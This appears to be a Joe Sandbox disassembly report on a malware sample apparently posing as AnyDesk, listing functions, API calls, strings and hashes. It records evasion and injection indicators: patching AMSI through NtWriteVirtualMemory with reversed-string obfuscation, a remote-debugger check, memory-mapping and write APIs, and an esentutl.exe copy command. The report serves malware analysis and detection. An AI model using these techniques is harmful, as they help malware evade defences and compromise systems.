DlpGetArchiveFileTraceInfo, xrefs: 02B4A4B3
NtWaitForSingleObject, xrefs: 02B4A677
CryptSIPGetSignedDataMsg, xrefs: 02B3FDFA
CreateProcessAsUserW, xrefs: 02B4AA2A, 02B4AA48
EnumServicesStatusA, xrefs: 02B4A9B2
WinHttp.WinHttpRequest.5.1, xrefs: 02B4233C
C:\Windows\System32\, xrefs: 02B4040A, 02B4796B, 02B486B3
NtQueryInformationThread, xrefs: 02B4AEE4
smartscreenps, xrefs: 02B40051, 02B40084, 02B400B7
GetProcessMemoryInfo, xrefs: 02B4A148
RtlAllocateHeap, xrefs: 02B4A644, 02B4A6AA
advapi32, xrefs: 02B4923F
MZP, xrefs: 02B49992
GET, xrefs: 02B42455
SLGetEncryptedPIDEx, xrefs: 02B4AE4B
NtCreateSection, xrefs: 02B4AF4A
EnumServicesStatusW, xrefs: 02B4A9C1
RtlQueryProcessDebugInformation, xrefs: 02B4A9A3
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02B464AA
WintrustAddActionID, xrefs: 02B3FC36
NtMapViewOfSection, xrefs: 02B4AF7D
NtDeviceIoControlFile, xrefs: 02B4A985
NtQueryVirtualMemory, xrefs: 02B4AEB1
.url, xrefs: 02B45D93

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 297057983-2644593349
Opcode ID: 3e7696bfdedb58693afab4776f432a15a48ca598833a72d60f0da1dccae6369b
Instruction ID: 0b06f27b408b9eff46295fb3a7cfe9cdcd163596bbe3d8e5a3744bd1a34a9f50
Opcode Fuzzy Hash: 3e7696bfdedb58693afab4776f432a15a48ca598833a72d60f0da1dccae6369b
Instruction Fuzzy Hash: B614F935A0426C8FDB11EB64DD80ACE73BAFF89304F5041E5A50DABA14DE30EE999F51

Function 02B25ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4E790), ref: 02B25AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4E790), ref: 02B25B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4E790), ref: 02B25B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B8B
RegQueryValueExA.ADVAPI32(?,02B25D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25BD1,?,80000001), ref: 02B25BA9
RegCloseKey.ADVAPI32(?,02B25BD8,00000000,?,?,00000000,02B25BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25BCB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25CEB

Strings

Software\Borland\Locales, xrefs: 02B25AFC, 02B25B1A
Software\Borland\Delphi\Locales, xrefs: 02B25B38

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 32726812b6fe90e2f89193f47e8cb84b92aa4603d1eb9f459080d5a52a0249f9
Instruction ID: c288e24e184b25ffa15e4740e4c97dc4cf02972ee292ebb0165217ce5320c4f9
Opcode Fuzzy Hash: 32726812b6fe90e2f89193f47e8cb84b92aa4603d1eb9f459080d5a52a0249f9
Instruction Fuzzy Hash: FB515771A5036C7AFB35D6A88C46FEF77ADDB04744F4001E1BA4CE6181E7749A488FA1

Function 02B3F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3F754
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3F766
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3F77D

Strings

KernelBase, xrefs: 02B3F74F
CheckRemoteDebuggerPresent, xrefs: 02B3F760

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: d2602d963ad197602b0ff9f0359c11d2e20625834c0824566c7e9024229995b0
Instruction ID: c06bd8e5d8b9ecb4dbf071c375e9d9da57031f89930f268349bd62d1710b7a66
Opcode Fuzzy Hash: d2602d963ad197602b0ff9f0359c11d2e20625834c0824566c7e9024229995b0
Instruction Fuzzy Hash: 53F0A070D04258FAEB13A6B888897EDFBA99B09328F2443D0E435A25D1E7711684CA91

Function 02B3DD70 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B24F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DE40), ref: 02B3DDAB
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DE40), ref: 02B3DDDB
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DDF0
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DE1C
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DE25

Part of subcall function 02B24C60: SysFreeString.OLEAUT32(02B3F4A4), ref: 02B24C6E

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: d8db1280009a71be50e4d4afaa3d878fbbace144fc72ce0e6e688b2438c9388f
Instruction ID: 00296453be3aac2ce27f435f4e04383783d915955da3a2682a4c23c852dc0511
Opcode Fuzzy Hash: d8db1280009a71be50e4d4afaa3d878fbbace144fc72ce0e6e688b2438c9388f
Instruction Fuzzy Hash: 6821C071A40319BAEB51EBE4CC52FDEB7BDEB48700F5104A1B704F7580EA74AA088B55

Function 02B3E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E5F6

Strings

ScanBuffer, xrefs: 02B3E53F
OpenSession, xrefs: 02B3E598
Initialize, xrefs: 02B3E4E6

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 46d6b4152e7173255bcde76f28ec42989b7bbeeca54f783faead6d167eaae1da
Instruction ID: 2f9584939bc65658355cf967a763aa95de9791c062e2b6514b00d6b48d0f64a5
Opcode Fuzzy Hash: 46d6b4152e7173255bcde76f28ec42989b7bbeeca54f783faead6d167eaae1da
Instruction Fuzzy Hash: 92413235B1021C9FEB02EBA4D841EDEB3FAEF88700F2044A6E145A7A51DA70ED09CF55

Function 02B37D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B381CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B3823C,?,?,00000000,?,02B37A7E,ntdll,00000000,00000000,02B37AC3,?,?,00000000), ref: 02B3820A
Part of subcall function 02B381CC: GetModuleHandleA.KERNELBASE(?), ref: 02B3821E

Part of subcall function 02B38274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
Part of subcall function 02B38274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
Part of subcall function 02B38274: GetProcAddress.KERNEL32(?,?), ref: 02B382D9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37DEC

Strings

yromeMlautriVetirW, xrefs: 02B37D93
Ntdll, xrefs: 02B37DC3

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: 41516c37e1b0b88097df43da733569ae0a79017d2998c3b6ff4eddd0d2503022
Instruction ID: b34c6361575f1d20452a347ef9cd35e56c4b1a68b16d03faac54e2f734ddefd0
Opcode Fuzzy Hash: 41516c37e1b0b88097df43da733569ae0a79017d2998c3b6ff4eddd0d2503022
Instruction Fuzzy Hash: FB018CB6644218AFDB02EF98DC42E9EB7FDEB4D700F5188D0B904D7600CA30AD15AF61

Function 02B36DC8 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B36D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02B36DB9,?,?,?,00000000), ref: 02B36D99

CoCreateInstance.OLE32(?,00000000,00000005,02B36EAC,00000000,00000000,02B36E2B,?,00000000,02B36E9B), ref: 02B36E17

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 59e0c1aa7accec5c0b7c63b964824d71285b660e9da91b94f2455a33f286c52f
Instruction ID: 9f5c991c44dbc8742fbb1ce6aff1ec60d0ab5fdadddc2f7d4f2c541ecd0450bb
Opcode Fuzzy Hash: 59e0c1aa7accec5c0b7c63b964824d71285b660e9da91b94f2455a33f286c52f
Instruction Fuzzy Hash: BD012B31208704BFF716EF61DC1296F7BFDD749B00F5108B5F405D2650EA309914C968

Function 02B21724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02B22000), ref: 02B217D0
Sleep.KERNEL32(0000000A,00000000,?,02B22000), ref: 02B217E6

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8bada386a870d20725908b21230689db3921679429af0ef5c47825145c68af56
Instruction ID: 64ce3a73e4f3340c5b51b9c6191a61975cd2e9b6a1ce17efe8643ca37e06051e
Opcode Fuzzy Hash: 8bada386a870d20725908b21230689db3921679429af0ef5c47825145c68af56
Instruction Fuzzy Hash: 04B12472A103A08BCB15CF2CD8C0366BBF1EB86351F1986EED55D8B396D7B09459CB90

Function 02B388B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02B388C1

Part of subcall function 02B38274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
Part of subcall function 02B38274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
Part of subcall function 02B38274: GetProcAddress.KERNEL32(?,?), ref: 02B382D9

Part of subcall function 02B37D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37DEC

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B38920

Strings

W, xrefs: 02B388CD
amsi, xrefs: 02B388BC
DllGetClassObject, xrefs: 02B388E6

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 2aafe512bb286c2c8bbcc11adbc4290f93bae2f825816b449bdd991a89be9e6a
Instruction ID: f5a451e37b535fc1ca397fe4a0723df43bada7dd1e7fd48acbc8ece9f2355883
Opcode Fuzzy Hash: 2aafe512bb286c2c8bbcc11adbc4290f93bae2f825816b449bdd991a89be9e6a
Instruction Fuzzy Hash: 65F0449054C381B9D302E6748C45F4BBFCD4B62264F448B98F1E85A2D2D675D1059B67

Function 02B21A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02B21FE4), ref: 02B21B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B21FE4), ref: 02B21B31

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2b640e81a77d469e38a0d321ae2488ee39c887a81d941ee7d6c0a3b1d509ce3d
Instruction ID: e60deee50405055af7dff1d4dfec1423d282340ed0690b5f5a9f753e8d824aba
Opcode Fuzzy Hash: 2b640e81a77d469e38a0d321ae2488ee39c887a81d941ee7d6c0a3b1d509ce3d
Instruction Fuzzy Hash: 9951AF716213608FDB15CF6CC989766BBE4EF46314F1886EED44CCB293E7A09449CB91

Function 02B3E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E5F6

Strings

ScanBuffer, xrefs: 02B3E53F
OpenSession, xrefs: 02B3E598
Initialize, xrefs: 02B3E4E6

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 6bcba793aca467c321c1387fb561e0e589248d0575b26dabe2a7be937be813da
Instruction ID: 75a2493cae8133e56ca8d59f217648d15a20c1265ac10167807aa4661a3133fa
Opcode Fuzzy Hash: 6bcba793aca467c321c1387fb561e0e589248d0575b26dabe2a7be937be813da
Instruction Fuzzy Hash: D2412F35B1021C9FEB02EBA4D841EDEB3FAEF88700F2044A6E145A7A51DA70ED098F55

Function 02B2E364 Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantClear.OLEAUT32(?), ref: 02B2E373

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 347e81542a48324c9b35fcf9ccef957cbf0b6ad69fb7e0a0f1367c704a4d45c9
Instruction ID: 8ce3d4e6dac0cc282565b1a16689287af48ac10c65e31854978d66baac957ab0
Opcode Fuzzy Hash: 347e81542a48324c9b35fcf9ccef957cbf0b6ad69fb7e0a0f1367c704a4d45c9
Instruction Fuzzy Hash: 01F06221708330C7DB267B3B8E846AD379ADF4038275094F6A40E9B215DF64EC4EC762

Function 02B370DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 02B373DA

Strings

H, xrefs: 02B37191

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 1946c049c70daefd3c09ecf7c25b640189c8669a446e2680bf3b111ded301c30
Instruction ID: d2b6e341f6257bc2cb6e1fb3c362ac53a734f900edb810b4004e58faab70ee55
Opcode Fuzzy Hash: 1946c049c70daefd3c09ecf7c25b640189c8669a446e2680bf3b111ded301c30
Instruction Fuzzy Hash: E7B1C4B5A01608DFDB15CF99D880A9DFBF2FF8A314F1485A9E845AB360DB30A845DF50

